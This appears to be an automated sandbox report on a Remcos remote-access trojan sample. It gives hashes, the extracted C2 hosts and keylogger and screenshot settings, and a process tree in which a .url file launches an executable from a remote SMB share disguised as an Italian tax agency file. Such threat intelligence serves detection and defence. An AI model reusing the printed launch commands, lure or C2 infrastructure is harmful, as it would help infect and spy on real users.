remcos | 2289f5e6c2e87cf4265ed7d05ef739d726ebd82614a1b856d4b5964834d307c9

General

Target

Direzione.url
Size

206B
MD5

6547426d8875ea1864bee6479a6a8fee
SHA1

6e27d0989f5c45a07a9dddaabcc3dcdbe5338d0a
SHA256

e3454a40e1903c9369f74b323df4dda0931449a0321cd3ae21f3e8d0ff92b93c
SHA512

b50af831ffcaebbd43db8f127148d8f70ec8e2909b064e1a9ec1683c42ea98ddf93bb0eaf10e8c42ebf94b343e08cc0919dd6a1eb33943aa9cd19e64e9b2b279

Score

10^/10

remcos remotehost rat

Malware Config

Extracted

Family

remcos

Botnet

RemoteHost

C2

listpoints.online:6090

retghrtgwtrgtg.bounceme.net:3839

listpoints.click:7020

datastream.myvnc.com:5225

gservicese.com:2718

center.onthewifi.com:8118

Attributes

audio_folder
MicRecords
audio_record_time
5
connect_delay
0
connect_interval
1
copy_file
explorer.exe
delete_file
false
hide_file
true
hide_keylog_file
false
install_flag
false
keylog_crypt
false
keylog_file
logs.dat
keylog_flag
false
keylog_folder
remcos
mouse_option
false
mutex
Rmc-BXAQVH
screenshot_crypt
false
screenshot_flag
false
screenshot_folder
Screenshots
screenshot_path
%AppData%
screenshot_time
10
take_screenshot_option
false
take_screenshot_time
5

Signatures

Remcos
Remcos is a closed-source remote control and surveillance software.
rat remcos

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

description	pid	Process	procid_target
PID 1412 created 2376	1412	Agenzia_Entrate_2023.exe	38

Checks computer location settings 2 TTPs 1 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-177160434-2093019976-369403398-1000\Control Panel\International\Geo\Nation	rundll32.exe

Executes dropped EXE 1 IoCs

pid	Process
1328	liveupdate.exe

Loads dropped DLL 1 IoCs

pid	Process
1328	liveupdate.exe

Suspicious use of SetThreadContext 1 IoCs

description	pid	Process	procid_target
PID 1328 set thread context of 3416	1328	liveupdate.exe	102

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious behavior: EnumeratesProcesses 7 IoCs

pid	Process
1412	Agenzia_Entrate_2023.exe
1412	Agenzia_Entrate_2023.exe
1412	Agenzia_Entrate_2023.exe
1328	liveupdate.exe
1328	liveupdate.exe
3416	cmd.exe
3416	cmd.exe

Suspicious behavior: MapViewOfSection 2 IoCs

pid	Process
1328	liveupdate.exe
3416	cmd.exe

Suspicious use of WriteProcessMemory 14 IoCs

description	pid	Process	procid_target
PID 2376 wrote to memory of 1412	2376	rundll32.exe	96
PID 2376 wrote to memory of 1412	2376	rundll32.exe	96
PID 2376 wrote to memory of 1412	2376	rundll32.exe	96
PID 1412 wrote to memory of 1328	1412	Agenzia_Entrate_2023.exe	101
PID 1412 wrote to memory of 1328	1412	Agenzia_Entrate_2023.exe	101
PID 1412 wrote to memory of 1328	1412	Agenzia_Entrate_2023.exe	101
PID 1328 wrote to memory of 3416	1328	liveupdate.exe	102
PID 1328 wrote to memory of 3416	1328	liveupdate.exe	102
PID 1328 wrote to memory of 3416	1328	liveupdate.exe	102
PID 1328 wrote to memory of 3416	1328	liveupdate.exe	102
PID 3416 wrote to memory of 4028	3416	cmd.exe	114
PID 3416 wrote to memory of 4028	3416	cmd.exe	114
PID 3416 wrote to memory of 4028	3416	cmd.exe	114
PID 3416 wrote to memory of 4028	3416	cmd.exe	114

C:\Windows\System32\rundll32.exe
"C:\Windows\System32\rundll32.exe" "C:\Windows\System32\ieframe.dll",OpenURL C:\Users\Admin\AppData\Local\Temp\Direzione.url
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2376
- \??\UNC\62.173.146.111\scarica\Agenzia_Entrate_2023.exe
  "\\62.173.146.111\scarica\Agenzia_Entrate_2023.exe"
  2⤵
  - Suspicious use of NtCreateUserProcessOtherParentProcess
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious use of WriteProcessMemory
  PID:1412
- C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe
  C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe
  2⤵
  - Executes dropped EXE
  - Loads dropped DLL
  - Suspicious use of SetThreadContext
  - Suspicious behavior: EnumeratesProcesses
  - Suspicious behavior: MapViewOfSection
  - Suspicious use of WriteProcessMemory
  PID:1328
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\SysWOW64\cmd.exe
    3⤵
    - Suspicious behavior: EnumeratesProcesses
    - Suspicious behavior: MapViewOfSection
    - Suspicious use of WriteProcessMemory
    PID:3416
  - - C:\Windows\SysWOW64\explorer.exe
      C:\Windows\SysWOW64\explorer.exe
      4⤵
      PID:4028

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

1

T1012

System Information Discovery

2

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\20793676

Filesize
1.1MB

MD5
22c28b874e958443c97e2338a23930f7

SHA1
ebb818e9293c92941184cf0cb4f58d12c33cc5aa

SHA256
bcc4e2a3ef873a4e4482000c1b70cb325b1ee9052b0b900da5a8e3495211455e

SHA512
5735cd8aadd0749a76b0000c20656a510779764816be9f7dcdf214ae78a220bd9d9cbf0e4f956901fc9abc1d7abbb0ffbfae79a583bb043f874125525682eea9

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\jouk.mpg

Filesize
1.0MB

MD5
4d91a20aa4d22ae69a4ea79f87174247

SHA1
74a240121fd831e4dfa657d38f31c4ae28ade8cf

SHA256
9c7007e3001feb3b3a3f1fed787fb03f2bc3a45b334d12e8cb118c1c4552e3e5

SHA512
eaf39b4253ed4f0e0dcd9130472b5fe4dfca2e45ea33cd9a4ea55824940ddf88fd882eab70d0543f951684b953611bba059b71a2ed076ed965fd24fe845bff79

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe

Filesize
485KB

MD5
6bf3b86782b7911b76029737162ae206

SHA1
1b8009865c79b5674734ba4ce9a6905bed78182e

SHA256
535f67c47f811aa5b421904959dd6931396a52cdbb9ddb69bface741356dbbef

SHA512
385291ef2ba36b39fd6c7c5af08ad9127d60685e28d69e55152341f522b79f2f4ca3c1aa9e13575dbce0699d976b34dbb5985d08495ca22dc20ed323b7d80ba1

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\liveupdate.exe

Filesize
485KB

MD5
6bf3b86782b7911b76029737162ae206

SHA1
1b8009865c79b5674734ba4ce9a6905bed78182e

SHA256
535f67c47f811aa5b421904959dd6931396a52cdbb9ddb69bface741356dbbef

SHA512
385291ef2ba36b39fd6c7c5af08ad9127d60685e28d69e55152341f522b79f2f4ca3c1aa9e13575dbce0699d976b34dbb5985d08495ca22dc20ed323b7d80ba1

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\log.dll

Filesize
101KB

MD5
e63883e03a5b030dcd4d4c4688c0fa59

SHA1
2fe9e4a94acb104b4a7acf29d1110653849efdec

SHA256
d9c661c6799daafd2dead8aca1c69e383999de94f18e0ef23f7b2787d56b5ed0

SHA512
828e3a10caf960b080391b6c2efee6591b903c5561a9e4e513af284de283b0f21a10935e168f287856e7cd6be5373f421491ec672341201a1f3d3ccdc98a4bf6

Download Submit
C:\Users\Admin\AppData\Roaming\DebugApp_v1\log.dll

Filesize
101KB

MD5
e63883e03a5b030dcd4d4c4688c0fa59

SHA1
2fe9e4a94acb104b4a7acf29d1110653849efdec

SHA256
d9c661c6799daafd2dead8aca1c69e383999de94f18e0ef23f7b2787d56b5ed0

SHA512
828e3a10caf960b080391b6c2efee6591b903c5561a9e4e513af284de283b0f21a10935e168f287856e7cd6be5373f421491ec672341201a1f3d3ccdc98a4bf6

Download Submit
memory/1328-23-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1328-24-0x00007FF8825F0000-0x00007FF8827E5000-memory.dmp

Filesize
2.0MB

Download
memory/1328-25-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1328-27-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1412-8-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1412-11-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1412-7-0x00000000033C0000-0x00000000033D0000-memory.dmp

Filesize
64KB

Download
memory/1412-9-0x00007FF8825F0000-0x00007FF8827E5000-memory.dmp

Filesize
2.0MB

Download
memory/1412-26-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/1412-16-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/3416-33-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/3416-31-0x00007FF8825F0000-0x00007FF8827E5000-memory.dmp

Filesize
2.0MB

Download
memory/3416-29-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/3416-34-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/3416-36-0x0000000073840000-0x00000000739BB000-memory.dmp

Filesize
1.5MB

Download
memory/4028-42-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-38-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-40-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-41-0x00000000009D0000-0x0000000000E03000-memory.dmp

Filesize
4.2MB

Download
memory/4028-37-0x00007FF8825F0000-0x00007FF8827E5000-memory.dmp

Filesize
2.0MB

Download
memory/4028-43-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-44-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-45-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-46-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-47-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-48-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download
memory/4028-49-0x0000000000400000-0x0000000000484000-memory.dmp

Filesize
528KB

Download

Analysis

Sharing